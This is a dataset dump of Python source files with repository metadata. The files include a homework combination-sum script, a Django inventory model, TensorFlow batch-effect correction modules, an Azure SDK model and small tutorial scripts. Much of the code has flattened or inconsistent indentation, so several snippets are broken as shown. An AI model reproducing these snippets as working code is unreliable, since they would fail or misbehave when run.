blob_id (string, lengths 40–40) | directory_id (string, lengths 40–40) | path (string, lengths 3–616) | content_id (string, lengths 40–40) | detected_licenses (sequence, lengths 0–112) | license_type (string, 2 classes) | repo_name (string, lengths 5–115) | snapshot_id (string, lengths 40–40) | revision_id (string, lengths 40–40) | branch_name (string, 777 classes) | visit_date (timestamp[us], 2015-08-06 10:31:46 – 2023-09-06 10:44:38) | revision_date (timestamp[us], 1970-01-01 02:38:32 – 2037-05-03 13:00:00) | committer_date (timestamp[us], 1970-01-01 02:38:32 – 2023-09-06 01:08:06) | github_id (int64, 4.92k – 681M, nullable) | star_events_count (int64, 0 – 209k) | fork_events_count (int64, 0 – 110k) | gha_license_id (string, 22 classes) | gha_event_created_at (timestamp[us], 2012-06-04 01:52:49 – 2023-09-14 21:59:50, nullable) | gha_created_at (timestamp[us], 2008-05-22 07:58:19 – 2023-08-21 12:35:19, nullable) | gha_language (string, 149 classes) | src_encoding (string, 26 classes) | language (string, 1 class) | is_vendor (bool, 2 classes) | is_generated (bool, 2 classes) | length_bytes (int64, 3 – 10.2M) | extension (string, 188 classes) | content (string, lengths 3 – 10.2M) | authors (sequence, lengths 1–1) | author_id (string, lengths 1–132) |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e99b1b904a183481565ed38808f38f03702f4e60 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2739/60825/244336.py | 391935b7e27570792c33d23a3858845f5b95b823 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 440 | py | res=[]
def printAns(currList, currSum, target, k):
    if currSum == target and len(currList) == k:
res.append(currList)
return
    elif currSum > target or len(currList) > k:
return
else:
        # start from the last chosen number (1 on the first call) so an empty
        # currList no longer raises IndexError
        start = currList[-1] if currList else 1
        for i in range(start, 9):
t=currList[:]
t.append(i)
printAns(t, currSum+i, target, k)
s=input()
k=int(s[0])
target=int(s[3:])
printAns([], 0, target, k)
print(res) | [
"[email protected]"
] | |
3e241bca87c1106e07b8d5ffd8e53da25cae808a | 8e1141fb8d9bf02d7e1c2fb887d66049d0860714 | /InvenTree/build/models.py | d09e7518785858212cb1d0f2ae5b953b0b916930 | [
"MIT"
] | permissive | ksanchezcld/InvenTree | 73ec392db5149814604e79690b465ae900af0c94 | ceea0533686305077c07c78ffa20ab4227ce2cf4 | refs/heads/master | 2023-02-28T10:07:02.741814 | 2018-05-12T02:44:29 | 2018-05-12T02:44:29 | 165,738,059 | 1 | 0 | MIT | 2023-02-11T19:31:42 | 2019-01-14T21:28:53 | JavaScript | UTF-8 | Python | false | false | 3,216 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.utils.translation import ugettext as _
from django.db import models
from django.core.validators import MinValueValidator
class Build(models.Model):
""" A Build object organises the creation of new parts from the component parts
It uses the part BOM to generate new parts.
Parts are then taken from stock
"""
def get_absolute_url(self):
return '/build/{pk}/'.format(pk=self.id)
# Build status codes
PENDING = 10 # Build is pending / active
HOLDING = 20 # Build is currently being held
CANCELLED = 30 # Build was cancelled
COMPLETE = 40 # Build is complete
BUILD_STATUS_CODES = {PENDING: _("Pending"),
HOLDING: _("Holding"),
CANCELLED: _("Cancelled"),
COMPLETE: _("Complete"),
}
batch = models.CharField(max_length=100, blank=True, null=True,
help_text='Batch code for this build output')
# Status of the build
status = models.PositiveIntegerField(default=PENDING,
choices=BUILD_STATUS_CODES.items(),
validators=[MinValueValidator(0)])
# Date the build model was 'created'
creation_date = models.DateField(auto_now=True, editable=False)
# Date the build was 'completed'
completion_date = models.DateField(null=True, blank=True)
# Brief build title
title = models.CharField(max_length=100, help_text='Brief description of the build')
# A reference to the part being built
# Only 'buildable' parts can be selected
part = models.ForeignKey('part.Part', on_delete=models.CASCADE,
related_name='builds',
limit_choices_to={'buildable': True},
)
# How many parts to build?
quantity = models.PositiveIntegerField(default=1,
validators=[MinValueValidator(1)],
help_text='Number of parts to build')
# Notes can be attached to each build output
notes = models.TextField(blank=True)
@property
def required_parts(self):
parts = []
for item in self.part.bom_items.all():
part = {'part': item.sub_part,
'per_build': item.quantity,
'quantity': item.quantity * self.quantity
}
parts.append(part)
return parts
@property
def can_build(self):
""" Return true if there are enough parts to supply build
"""
for item in self.required_parts:
if item['part'].total_stock < item['quantity']:
return False
return True
@property
def is_active(self):
""" Is this build active?
An active build is either:
- Pending
- Holding
"""
return self.status in [
self.PENDING,
self.HOLDING
]
@property
def is_complete(self):
return self.status == self.COMPLETE
| [
"[email protected]"
] | |
3b81da56caa93e61d28fabd2fb15cbe2d6049842 | af6feb644d2435e1d656556261e5e100209beb1c | /helper/show_pred.py | 3e501e41b0d01880007c112e02a8e8be86dcecf8 | [
"MIT"
] | permissive | liusida/TorchServe_FaceLandmark_Example | f2ca5d1e9cde2eed340ce46584a06cb0e16ef4ac | 1e854f2f82874255b59ca27b19d3a3254fe69636 | refs/heads/main | 2023-04-26T16:25:18.421724 | 2021-05-26T03:25:00 | 2021-05-26T03:25:00 | 370,864,633 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,081 | py | import collections
import matplotlib.pyplot as plt
def show_pred(preds, input_img, only_2d=True, filename=None):
# 2D-Plot
plot_style = dict(marker='o',
markersize=4,
linestyle='-',
lw=2)
pred_type = collections.namedtuple('prediction_type', ['slice', 'color'])
pred_types = {'face': pred_type(slice(0, 17), (0.682, 0.780, 0.909, 0.5)),
'eyebrow1': pred_type(slice(17, 22), (1.0, 0.498, 0.055, 0.4)),
'eyebrow2': pred_type(slice(22, 27), (1.0, 0.498, 0.055, 0.4)),
'nose': pred_type(slice(27, 31), (0.345, 0.239, 0.443, 0.4)),
'nostril': pred_type(slice(31, 36), (0.345, 0.239, 0.443, 0.4)),
'eye1': pred_type(slice(36, 42), (0.596, 0.875, 0.541, 0.3)),
'eye2': pred_type(slice(42, 48), (0.596, 0.875, 0.541, 0.3)),
'lips': pred_type(slice(48, 60), (0.596, 0.875, 0.541, 0.3)),
'teeth': pred_type(slice(60, 68), (0.596, 0.875, 0.541, 0.4))
}
fig = plt.figure(figsize=plt.figaspect(.5))
ax = fig.add_subplot(1, 1 if only_2d else 2, 1)
ax.imshow(input_img)
for pred_type in pred_types.values():
ax.plot(preds[pred_type.slice, 0],
preds[pred_type.slice, 1],
color=pred_type.color, **plot_style)
ax.axis('off')
if not only_2d:
# 3D-Plot
ax = fig.add_subplot(1, 2, 2, projection='3d')
surf = ax.scatter(preds[:, 0] * 1.2,
preds[:, 1],
preds[:, 2],
c='cyan',
alpha=1.0,
edgecolor='b')
for pred_type in pred_types.values():
ax.plot3D(preds[pred_type.slice, 0] * 1.2,
preds[pred_type.slice, 1],
preds[pred_type.slice, 2], color='blue')
ax.view_init(elev=90., azim=90.)
ax.set_xlim(ax.get_xlim()[::-1])
if filename:
plt.savefig(filename)
else:
plt.show()
| [
"[email protected]"
] | |
c97124271bc6733cf52b3bba45b66aac83594937 | c50598d4ce8e6c906748021060f1df84e16372ca | /Cell_BLAST/rmbatch.py | 655f033ddd7728aabe6e52fbaf541a4df57fa836 | [
"MIT"
] | permissive | BacemDataScience/Cell_BLAST | f4407571e321fbc6aeb8642a994767e6e1f381fa | d0e25fa695cb8cebcba68dd32fe5e7e96743803f | refs/heads/master | 2020-09-10T02:31:00.758648 | 2019-09-28T16:06:55 | 2019-09-28T16:06:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,479 | py | """
Batch effect removing modules for DIRECTi
"""
import tensorflow as tf
from . import nn
from . import module
from . import utils
class RMBatch(module.Module):
"""
Parent class for systematical bias / batch effect removal modules.
"""
def __init__(self, batch_dim, delay=20, name="RMBatch"):
super(RMBatch, self).__init__(name=name)
self.batch_dim = batch_dim
self.delay = delay
if self._delay_guard not in self.on_epoch_end:
self.on_epoch_end.append(self._delay_guard)
def _build_regularizer(self, input_tensor, training_flag, epoch, scope=""):
with tf.name_scope("placeholder/"):
self.batch = tf.placeholder(
dtype=tf.float32, shape=(None, self.batch_dim),
name=self.scope_safe_name
)
return 0.0
def _build_feed_dict(self, data_dict):
return {
self.batch: utils.densify(data_dict[self.name])
} if self.name in data_dict else {}
def __bool__(self):
return True
def _get_config(self):
return {
"batch_dim": self.batch_dim,
"delay": self.delay,
**super(RMBatch, self)._get_config()
}
def _delay_guard(self, model, train_data_dict, val_data_dict, loss):
_epoch = model.sess.run(model.epoch)
return _epoch >= self.delay
class Adversarial(RMBatch):
"""
Build a batch effect correction module that uses adversarial batch alignment.
Parameters
----------
batch_dim : int
Number of batches.
h_dim : int
Dimensionality of the hidden layers in the discriminator MLP, by default 128.
depth : int
Number of hidden layers in the discriminator MLP, by default 1.
dropout : float
Dropout rate, by default 0.0.
lambda_reg : float
        Strength of batch effect correction, by default 0.01.
n_steps : int
How many discriminator steps to run for each encoder step, by default 1.
name : str
Name of the module, by default "AdvBatch".
"""
def __init__(self, batch_dim, h_dim=128, depth=1, dropout=0.0,
lambda_reg=0.01, n_steps=1, delay=20, name="AdvBatch"):
super(Adversarial, self).__init__(batch_dim, delay=delay, name=name)
self.h_dim = h_dim
self.depth = depth
self.dropout = dropout
self.lambda_reg = lambda_reg
self.n_steps = n_steps
def _build_regularizer(self, input_tensor, training_flag,
epoch, scope="discriminator"):
with tf.name_scope("placeholder/"):
self.batch = tf.placeholder(
dtype=tf.float32, shape=(None, self.batch_dim),
name=self.scope_safe_name
)
self.build_regularizer_scope = "%s/%s" % (scope, self.scope_safe_name)
with tf.variable_scope(self.build_regularizer_scope):
mask = tf.cast(tf.reduce_sum(self.batch, axis=1) > 0, tf.int32)
batch = tf.dynamic_partition(self.batch, mask, 2)[1]
input_tensor = tf.dynamic_partition(input_tensor, mask, 2)[1]
batch_pred = tf.identity(nn.dense(nn.mlp(
input_tensor, [self.h_dim] * self.depth,
dropout=self.dropout, training_flag=training_flag
), self.batch_dim), "batch_logit")
self.batch_d_loss = tf.cast(
epoch >= self.delay, tf.float32
) * tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits_v2(
labels=batch, logits=batch_pred
), name="d_loss"
)
self.batch_g_loss = tf.negative(self.batch_d_loss, name="g_loss")
self.vars_to_save += tf.get_collection(
tf.GraphKeys.GLOBAL_VARIABLES, self.build_regularizer_scope)
tf.add_to_collection(tf.GraphKeys.LOSSES, self.batch_d_loss)
return self.lambda_reg * self.batch_g_loss
def _compile(self, optimizer, lr):
with tf.variable_scope("optimize/%s" % self.scope_safe_name):
optimizer = getattr(tf.train, optimizer)(lr)
control_dependencies = []
for _ in range(self.n_steps):
with tf.control_dependencies(control_dependencies):
self.step = optimizer.minimize(
self.lambda_reg * self.batch_d_loss,
var_list=tf.get_collection(
tf.GraphKeys.TRAINABLE_VARIABLES,
self.build_regularizer_scope
)
)
control_dependencies = [self.step]
tf.add_to_collection(tf.GraphKeys.UPDATE_OPS, self.step)
def _get_config(self):
return {
"h_dim": self.h_dim,
"depth": self.depth,
"dropout": self.dropout,
"lambda_reg": self.lambda_reg,
"n_steps": self.n_steps,
**super(Adversarial, self)._get_config()
}
class MNN(RMBatch):
"""
Build a batch effect correction module that uses mutual nearest neighbor
(MNN) distance regularization.
Parameters
----------
batch_dim : int
Number of batches.
n_neighbors : int
Number of nearest neighbors to use when selecting mutual nearest
neighbors, by default 5.
lambda_reg : float
        Strength of batch effect correction, by default 1.0.
delay : int
        How many epochs to delay before using MNN batch correction,
by default 20.
name : str
Name of the module, by default "MNNBatch".
"""
def __init__(
self, batch_dim, n_neighbors=5, lambda_reg=1.0,
delay=20, name="MNN"
):
super(MNN, self).__init__(batch_dim, delay=delay, name=name)
self.n_neighbors = n_neighbors
self.lambda_reg = lambda_reg
def _build_regularizer(self, input_tensor, training_flag, epoch, scope="MNN"):
with tf.name_scope("placeholder/"):
self.batch = tf.placeholder(dtype=tf.float32, shape=(
None, self.batch_dim
), name=self.scope_safe_name)
with tf.name_scope("%s/%s" % (scope, self.scope_safe_name)):
batches = tf.dynamic_partition(
input_tensor,
partitions=tf.argmax(self.batch, axis=1, output_type=tf.int32),
num_partitions=self.batch_dim
)
use_flags = [tf.shape(batch)[0] > 0 for batch in batches]
penalties = []
for i in range(len(batches)):
for j in range(i + 1, len(batches)):
penalties.append(tf.cond(
tf.logical_and(use_flags[i], use_flags[j]),
lambda i=i, j=j: self._cross_batch_penalty(batches[i], batches[j]),
lambda: tf.zeros((0,))
))
penalties = tf.concat(penalties, axis=0)
return tf.cast(
epoch > self.delay, tf.float32
) * self.lambda_reg * tf.reduce_mean(penalties, name="MNN_loss")
def _cross_batch_penalty(self, x, y): # MNN
x1, y0 = tf.expand_dims(x, axis=1), tf.expand_dims(y, axis=0)
xy_dist = tf.reduce_sum(tf.square(x1 - y0), axis=2)
xy_mask = tf.cast(self._mnn_mask(xy_dist, self.n_neighbors), tf.float32)
return tf.reshape(xy_dist * xy_mask, [-1])
@staticmethod
def _neighbor_mask(d, k):
n = tf.shape(d)[1]
_, idx = tf.nn.top_k(tf.negative(d), k=tf.minimum(k, n))
return tf.cast(tf.reduce_sum(tf.one_hot(idx, depth=n), axis=1), tf.bool)
@staticmethod
def _mnn_mask(d, k):
return tf.logical_and(
MNN._neighbor_mask(d, k),
tf.transpose(MNN._neighbor_mask(tf.transpose(d), k))
)
def _get_config(self):
return {
"n_neighbors": self.n_neighbors,
"lambda_reg": self.lambda_reg,
**super(MNN, self)._get_config()
}
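# Illustrative NumPy sketch (not part of the original module; all names below
# are assumptions): the masks built by _neighbor_mask/_mnn_mask above mark a
# pair (i, j) as mutual nearest neighbors iff j is among the k nearest
# neighbors of row point i AND i is among the k nearest neighbors of column
# point j.
import numpy as np

def _knn_mask_np(d, k):  # d: (n, m) matrix of pairwise squared distances
    idx = np.argsort(d, axis=1)[:, :k]  # column indices of the k smallest entries per row
    mask = np.zeros(d.shape, dtype=bool)
    np.put_along_axis(mask, idx, True, axis=1)
    return mask

def _mnn_mask_np(d, k):  # NumPy mirror of MNN._mnn_mask
    return _knn_mask_np(d, k) & _knn_mask_np(d.T, k).T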
class MNNAdversarial(Adversarial, MNN):
"""
Build a batch effect correction module that uses adversarial batch alignment
among cells with mutual nearest neighbors.
Parameters
----------
batch_dim : int
Number of batches.
h_dim : int
Dimensionality of the hidden layers in the discriminator MLP, by default 128.
depth : int
Number of hidden layers in the discriminator MLP, by default 1.
dropout : float
Dropout rate, by default 0.0.
lambda_reg : float
        Strength of batch effect correction, by default 0.01.
n_steps : int
How many discriminator steps to run for each encoder step, by default 1.
n_neighbors : int
Number of nearest neighbors to use when selecting mutual nearest
neighbors, by default 5.
delay : int
        How many epochs to delay before using MNN batch correction,
by default 20.
name : str
Name of the module, by default "MNNAdvBatch".
"""
def __init__(
self, batch_dim, h_dim=128, depth=1, dropout=0.0,
lambda_reg=0.01, n_steps=1, n_neighbors=5, delay=20,
name="MNNAdvBatch"
):
super(MNNAdversarial, self).__init__(
batch_dim, h_dim, depth, dropout, lambda_reg, n_steps,
delay=delay, name=name
) # Calls Adversarial.__init__
self.n_neighbors = n_neighbors
def _build_regularizer(self, input_tensor, training_flag,
epoch, scope="discriminator"):
with tf.name_scope("placeholder/"):
self.batch = tf.placeholder(
dtype=tf.float32, shape=(None, self.batch_dim),
name=self.scope_safe_name
)
self.build_regularizer_scope = "%s/%s" % (scope, self.scope_safe_name)
with tf.variable_scope(self.build_regularizer_scope):
mask = tf.cast(tf.reduce_sum(self.batch, axis=1) > 0, tf.int32)
batch = tf.dynamic_partition(self.batch, mask, 2)[1]
input_tensor = tf.dynamic_partition(input_tensor, mask, 2)[1]
input_idx = tf.expand_dims(tf.cast(
tf.range(tf.shape(input_tensor)[0]), tf.float32
), axis=1)
_input_tensor = tf.concat([input_idx, input_tensor], axis=1)
batches = tf.dynamic_partition(
_input_tensor,
partitions=tf.argmax(batch, axis=1, output_type=tf.int32),
num_partitions=self.batch_dim
)
use_flags = [tf.shape(item)[0] > 0 for item in batches]
batches = [(item[:, 0], item[:, 1:]) for item in batches]
include_idx = []
for i in range(len(batches)):
for j in range(i + 1, len(batches)):
include_idx.append(tf.cond(
tf.logical_and(use_flags[i], use_flags[j]),
lambda i=i, j=j: self._mnn_idx(batches[i], batches[j], self.n_neighbors),
lambda: (tf.zeros((0,)), tf.zeros((0,)))
))
include_idx = [j for i in include_idx for j in i] # flatten
self.include_idx = tf.unique(tf.cast(
tf.concat(include_idx, axis=0), tf.int32))[0]
input_tensor = tf.gather(input_tensor, self.include_idx)
batch = tf.gather(batch, self.include_idx)
batch_pred = tf.identity(nn.dense(nn.mlp(
input_tensor, [self.h_dim] * self.depth,
dropout=self.dropout, training_flag=training_flag
), self.batch_dim), "batch_logit")
self.batch_d_loss = tf.multiply(tf.cast(
epoch >= self.delay, tf.float32
), tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits_v2(
labels=batch, logits=batch_pred
), name="raw_d_loss"
), name="d_loss")
self.batch_g_loss = tf.negative(self.batch_d_loss, name="g_loss")
self.vars_to_save += tf.get_collection(
tf.GraphKeys.GLOBAL_VARIABLES, self.build_regularizer_scope)
tf.add_to_collection(tf.GraphKeys.LOSSES, self.batch_d_loss)
return self.lambda_reg * self.batch_g_loss
@staticmethod
def _mnn_idx(batch1, batch2, k):
(xi, x), (yi, y) = batch1, batch2
x1, y0 = tf.expand_dims(x, axis=1), tf.expand_dims(y, axis=0)
xy_dist = tf.reduce_sum(tf.square(x1 - y0), axis=2)
xy_mask = tf.cast(MNNAdversarial._mnn_mask(xy_dist, k), tf.int32)
return (
tf.dynamic_partition(xi, tf.cast(
tf.reduce_sum(xy_mask, axis=1) > 0, tf.int32
), 2)[1],
tf.dynamic_partition(yi, tf.cast(
tf.reduce_sum(xy_mask, axis=0) > 0, tf.int32
), 2)[1]
)
# EXPERIMENTAL
class AdaptiveMNNAdversarial(MNNAdversarial):
def __init__(
self, batch_dim, h_dim=128, depth=1, dropout=0.0,
lambda_reg=0.01, n_steps=1, n_neighbors=5, delay=20,
name="AdptMNNAdvBatch"
):
super(AdaptiveMNNAdversarial, self).__init__(
batch_dim, h_dim, depth, dropout, lambda_reg, n_steps, n_neighbors,
delay=delay, name=name
)
def _build_regularizer(self, input_tensor, training_flag,
epoch, scope="discriminator"):
with tf.name_scope("placeholder/"):
self.batch = tf.placeholder(
dtype=tf.float32, shape=(None, self.batch_dim),
name=self.scope_safe_name
)
self.build_regularizer_scope = "%s/%s" % (scope, self.scope_safe_name)
with tf.variable_scope(self.build_regularizer_scope):
# Select cells with batch identity
mask = tf.cast(tf.reduce_sum(self.batch, axis=1) > 0, tf.int32)
batch = tf.dynamic_partition(self.batch, mask, 2)[1]
input_tensor = tf.dynamic_partition(input_tensor, mask, 2)[1]
# Build MNN mask
n = tf.shape(batch)[0]
input_idx = tf.expand_dims(tf.cast(tf.range(n), tf.float32), axis=1)
_input_tensor = tf.concat([input_idx, input_tensor], axis=1)
batches = tf.dynamic_partition(
_input_tensor,
partitions=tf.argmax(batch, axis=1, output_type=tf.int32),
num_partitions=self.batch_dim
)
use_flags = [tf.shape(item)[0] > 0 for item in batches]
batches = [(item[:, 0], item[:, 1:]) for item in batches]
self.mask_mat = []
for i in range(len(batches)):
for j in range(i + 1, len(batches)):
idx_mask = tf.cond(
tf.logical_and(use_flags[i], use_flags[j]),
lambda i=i, j=j: self._mnn_idx_mask(
batches[i], batches[j], self.n_neighbors, n),
lambda: tf.zeros((n,))
)
idx_mask = tf.expand_dims(idx_mask, axis=1)
self.mask_mat.append(tf.concat([
tf.zeros((n, i)), idx_mask,
tf.zeros((n, j - i - 1)), idx_mask,
tf.zeros((n, self.batch_dim - j - 1))
], axis=1))
self.mask_mat = tf.cast(tf.add_n(self.mask_mat) > 0, tf.int32)
include_mask = tf.cast(tf.reduce_sum(
self.mask_mat, axis=1
) > 0, tf.int32)
self.mask_mat = tf.dynamic_partition(self.mask_mat, include_mask, 2)[1]
batch = tf.dynamic_partition(batch, include_mask, 2)[1]
input_tensor = tf.dynamic_partition(input_tensor, include_mask, 2)[1]
# Distriminator loss
batch_pred = tf.identity(nn.dense(nn.mlp(
input_tensor, [self.h_dim] * self.depth,
dropout=self.dropout, training_flag=training_flag
), self.batch_dim), "batch_logit")
self.batch_d_loss = tf.cast(
epoch >= self.delay, tf.float32
) * tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits_v2(
labels=batch, logits=batch_pred
), name="d_loss"
)
# Generator loss
self.batch_g_loss = tf.cast(
epoch >= self.delay, tf.float32
) * tf.negative(tf.reduce_mean(tf.scan(
self._masked_softmax_cross_entropy_with_logits,
(batch, batch_pred, self.mask_mat),
tf.zeros(()), parallel_iterations=128
)), name="g_loss")
self.vars_to_save += tf.get_collection(
tf.GraphKeys.GLOBAL_VARIABLES, self.build_regularizer_scope)
tf.add_to_collection(tf.GraphKeys.LOSSES, self.batch_d_loss)
return self.lambda_reg * self.batch_g_loss
@staticmethod
def _mnn_idx_mask(batch1, batch2, k, n):
idx1, idx2 = AdaptiveMNNAdversarial._mnn_idx(batch1, batch2, k)
idx = tf.cast(tf.concat([idx1, idx2], axis=0), tf.int32)
return tf.reduce_sum(tf.one_hot(idx, depth=n), axis=0)
@staticmethod
def _masked_softmax_cross_entropy_with_logits(cum, tensors):
labels, logits, mask = tensors
labels = tf.dynamic_partition(labels, mask, 2)[1]
logits = tf.dynamic_partition(logits, mask, 2)[1]
return tf.reduce_sum(labels * (tf.reduce_logsumexp(logits) - logits))
| [
"[email protected]"
] | |
b57127734749739690a92ea4af6da4fa3a1d9bd5 | 50948d4cb10dcb1cc9bc0355918478fb2841322a | /azure-mgmt-storage/azure/mgmt/storage/v2017_06_01/models/sku_py3.py | 8bb382d6481045d2cc41fe140e170b08d4bbffa6 | [
"MIT"
] | permissive | xiafu-msft/azure-sdk-for-python | de9cd680b39962702b629a8e94726bb4ab261594 | 4d9560cfd519ee60667f3cc2f5295a58c18625db | refs/heads/master | 2023-08-12T20:36:24.284497 | 2019-05-22T00:55:16 | 2019-05-22T00:55:16 | 187,986,993 | 1 | 0 | MIT | 2020-10-02T01:17:02 | 2019-05-22T07:33:46 | Python | UTF-8 | Python | false | false | 3,319 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class Sku(Model):
"""The SKU of the storage account.
Variables are only populated by the server, and will be ignored when
sending a request.
All required parameters must be populated in order to send to Azure.
:param name: Required. Gets or sets the sku name. Required for account
creation; optional for update. Note that in older versions, sku name was
called accountType. Possible values include: 'Standard_LRS',
'Standard_GRS', 'Standard_RAGRS', 'Standard_ZRS', 'Premium_LRS'
:type name: str or ~azure.mgmt.storage.v2017_06_01.models.SkuName
:ivar tier: Gets the sku tier. This is based on the SKU name. Possible
values include: 'Standard', 'Premium'
:vartype tier: str or ~azure.mgmt.storage.v2017_06_01.models.SkuTier
:ivar resource_type: The type of the resource, usually it is
'storageAccounts'.
:vartype resource_type: str
:ivar kind: Indicates the type of storage account. Possible values
include: 'Storage', 'BlobStorage'
:vartype kind: str or ~azure.mgmt.storage.v2017_06_01.models.Kind
:ivar locations: The set of locations that the SKU is available. This will
be supported and registered Azure Geo Regions (e.g. West US, East US,
Southeast Asia, etc.).
:vartype locations: list[str]
:ivar capabilities: The capability information in the specified sku,
including file encryption, network acls, change notification, etc.
:vartype capabilities:
list[~azure.mgmt.storage.v2017_06_01.models.SKUCapability]
:param restrictions: The restrictions because of which SKU cannot be used.
This is empty if there are no restrictions.
:type restrictions:
list[~azure.mgmt.storage.v2017_06_01.models.Restriction]
"""
_validation = {
'name': {'required': True},
'tier': {'readonly': True},
'resource_type': {'readonly': True},
'kind': {'readonly': True},
'locations': {'readonly': True},
'capabilities': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'SkuName'},
'tier': {'key': 'tier', 'type': 'SkuTier'},
'resource_type': {'key': 'resourceType', 'type': 'str'},
'kind': {'key': 'kind', 'type': 'Kind'},
'locations': {'key': 'locations', 'type': '[str]'},
'capabilities': {'key': 'capabilities', 'type': '[SKUCapability]'},
'restrictions': {'key': 'restrictions', 'type': '[Restriction]'},
}
def __init__(self, *, name, restrictions=None, **kwargs) -> None:
super(Sku, self).__init__(**kwargs)
self.name = name
self.tier = None
self.resource_type = None
self.kind = None
self.locations = None
self.capabilities = None
self.restrictions = restrictions
| [
"[email protected]"
] | |
daa712434a43b1506008cb02c38d0182d39483c2 | b9c55de2b21ca781ab5522da8a1db34ed55bd644 | /django-app/member/urls.py | cee47f79b216288c4dad0072c53238b1df7520be | [] | no_license | JeongEuiJin/model-wed-p | 04a8ed2aa8145a860e214c563fcebae9d7e39692 | 9fb987f5fe65c05825c519d6ef4bd4d802e0dccb | refs/heads/master | 2021-01-21T21:05:07.169721 | 2017-06-19T12:11:51 | 2017-06-19T12:11:51 | 94,772,729 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 198 | py | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.student_list, name='student_list'),
url(r'^(?P<s_pk>\d+)/$', views.student_del, name='student_del')
]
| [
"[email protected]"
] | |
e789385cd300ec837af0be820f02f87154600e1d | 8a4a4cab76ddf1b19a017c3e5c765caf9a5fe3cc | /test/test_remote_app_permission_update_user.py | 45ffee2297dddce630ab3389a4f5adc204e15ffc | [] | no_license | ibuler/testsdk | fa724ff129e2a6144c05b8330cd4014c8bfb9a58 | 015bc6ca7da64180a2a11756a4e7cce733aca806 | refs/heads/master | 2020-06-23T09:02:50.322517 | 2019-07-25T05:51:26 | 2019-07-25T05:51:26 | 198,577,933 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,020 | py | # coding: utf-8
"""
Jumpserver API Docs
Jumpserver Restful api docs # noqa: E501
OpenAPI spec version: v1
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from swagger_client.models.remote_app_permission_update_user import RemoteAppPermissionUpdateUser # noqa: E501
from swagger_client.rest import ApiException
class TestRemoteAppPermissionUpdateUser(unittest.TestCase):
"""RemoteAppPermissionUpdateUser unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testRemoteAppPermissionUpdateUser(self):
"""Test RemoteAppPermissionUpdateUser"""
# FIXME: construct object with mandatory attributes with example values
# model = swagger_client.models.remote_app_permission_update_user.RemoteAppPermissionUpdateUser() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
2fafa7209aecd8c1e4b79ff259093980bd081564 | b9a73fe404ee30baf8a88276030363ad2d1d4cc5 | /old/BRNN_Gap/eval.py | d8cfef3415e874b7220fbd604a5df6822553a2ff | [] | no_license | everglowing/Language-Models | 06da6befceef9b4fd1f43ba7d6708fcf8862f715 | 67db3fc5d0b0ef099cac306bd78294764d3587cf | refs/heads/master | 2021-01-13T04:12:41.341299 | 2016-12-27T18:53:24 | 2016-12-27T18:53:24 | 77,684,222 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,473 | py | from __future__ import print_function
import numpy as np
import tensorflow as tf
import argparse
import codecs
import time
import os
from six.moves import cPickle
from utils import TextLoader
from model import Model
from six import text_type
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--save_dir', type=str, default='save',
help='model directory to store checkpointed models')
parser.add_argument('--text', type=str,
help='filename of text to evaluate on')
args = parser.parse_args()
eval(args)
def eval(args):
with open(os.path.join(args.save_dir, 'config.pkl'), 'rb') as f:
saved_args = cPickle.load(f)
saved_args.batch_size = 1
saved_args.seq_length = 200
with open(os.path.join(args.save_dir, 'chars_vocab.pkl'), 'rb') as f:
chars, vocab = cPickle.load(f)
model = Model(saved_args, infer=False, evaluation=True)
with codecs.open(args.text, 'r', encoding='utf-8') as f:
text = f.read()
with tf.Session() as sess:
tf.initialize_all_variables().run()
saver = tf.train.Saver(tf.all_variables())
ckpt = tf.train.get_checkpoint_state(args.save_dir)
if ckpt and ckpt.model_checkpoint_path:
saver.restore(sess, ckpt.model_checkpoint_path)
ppl = model.eval(sess, chars, vocab, text)
print('perplexity: {0}'.format(ppl))
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
cedcb016825d6154f200e7ccfe1d53847c674bb6 | 9512f329d9326ed0b9436202947de9eee0c6c387 | /Cap07-estruturas_de_repeticao/for_03.py | dcfe65ac3989ce9551d9ca9f6b3a0ccdf9f82056 | [] | no_license | frclasso/CodeGurus_Python_mod1-turma1_2019 | 9fffd76547256ac480db41536223682a5b152944 | e34d60498ee45566dbf1182551d91250a9aab272 | refs/heads/master | 2020-04-30T02:01:50.757611 | 2019-06-10T15:38:58 | 2019-06-10T15:38:58 | 176,546,912 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 687 | py | # loop aninhado
lot_2D = [
['Toyota', 'Audi', 'BMW'],
['Lexus', 'Jeep'],
['Honda', 'Kia', 'Mazda']
]
#print(lot_2D[0][0]) # list 0, element 0 of list 0
# for linha in lot_2D:
# for carro in linha:
# print(carro)
lot_3D =[
[
['Tesla', 'Fiat', 'BMW'],
['Honda', 'Jeep'],
['Saab','Kia', 'Ford']
],
[
['Subaru', 'Nissan'],
['Volkswagen'],
['Mercedez']
],
[
